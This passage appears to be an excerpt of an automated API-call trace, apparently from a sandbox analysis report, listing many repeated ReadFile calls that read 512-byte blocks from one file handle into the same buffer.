lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.932] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.933] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.934] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.936] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.937] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.938] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.940] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.941] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, 